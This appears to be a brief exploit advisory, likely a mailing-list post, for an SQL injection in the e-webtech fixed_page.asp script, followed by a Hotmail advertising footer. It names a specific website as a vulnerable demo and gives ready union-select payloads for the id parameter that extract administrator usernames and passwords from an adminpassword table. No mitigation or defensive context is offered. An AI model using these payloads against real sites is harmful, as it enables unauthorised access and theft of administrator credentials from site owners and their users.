#################################################### e-webtech (fixed_page.asp) SQL Injection Vulnerability #################################################### # Author : Fl0riX # # Name : e-webtech # # Bug Type : SQL Injection # # Infection : Admin login bilgileri alinabilir. # # Demo Vuln : # # http:// smsj.ca/fixed_page.asp?id=[SQL Inj.] # # User Exploit:null+union+all+select+1,username+from+adminpassword # Password Exploit:null+union+all+select+1,pw+from+adminpassword #################################################### _________________________________________________________________ Windows Live Hotmail: Arkadaşlarınız Facebook'taki güncellemelerinizi doğrudan Hotmail®'den alır. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009